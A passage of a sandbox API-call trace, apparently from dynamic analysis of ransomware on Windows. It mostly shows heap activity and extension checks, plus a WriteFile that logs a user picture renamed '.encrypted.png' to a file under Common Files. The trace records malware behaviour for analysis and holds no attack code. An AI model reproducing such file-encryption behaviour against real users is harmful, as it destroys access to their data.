(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.432] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.432] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.432] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0039.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.433] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0039.433] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.433] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.433] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.433] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.433] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.433] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.433] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2917, lpOverlapped=0x0) returned 1 [0039.433] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.433] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2917, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.433] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0039.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.encrypted.png\r\n", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0039.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.encrypted.png\r\n", cchWideChar=68, lpMultiByteStr=0x88e138, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.encrypted.png\r\n", lpUsedDefaultChar=0x0) returned 68 [0039.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0039.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0039.434] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x43, lpOverlapped=0x0) returned 1 [0039.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.434] CloseHandle (hObject=0x140) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.435] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0039.435] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0039.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.436] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.437] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.437] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.437] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8e0 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0039.437] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0039.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0039.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0039.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.440] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.441] RtlAllocateHeap 